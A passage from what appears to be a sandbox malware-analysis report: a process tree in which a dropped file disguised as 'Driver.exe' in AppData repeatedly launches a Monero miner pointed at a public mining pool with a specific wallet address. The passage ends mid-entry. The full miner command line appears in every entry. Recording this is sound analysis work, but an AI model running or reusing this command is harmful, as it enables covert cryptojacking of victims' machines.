  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1512
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1852
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:3020
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1580
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2876
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2944
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2092
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1704
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:3048
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2304
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1952
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1856
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:764
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1860
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1500
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1048
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2448
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1192
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1044
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1728
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1644
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1572
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1948
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2512
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2512
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2372
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2024
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2484
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2116
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1452
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2376
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2560
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2996
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2280
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1872
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2256
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2400
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2288
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2020
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1544
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2576
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2996
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2444
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2428
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1436
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:272
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2024
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2804
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1244
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:612
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1964
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2060
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2592
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:612
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:760
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2232
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2164
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1800
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1756
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1516
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1968
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:340
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2136
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1128
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1264
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1472
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
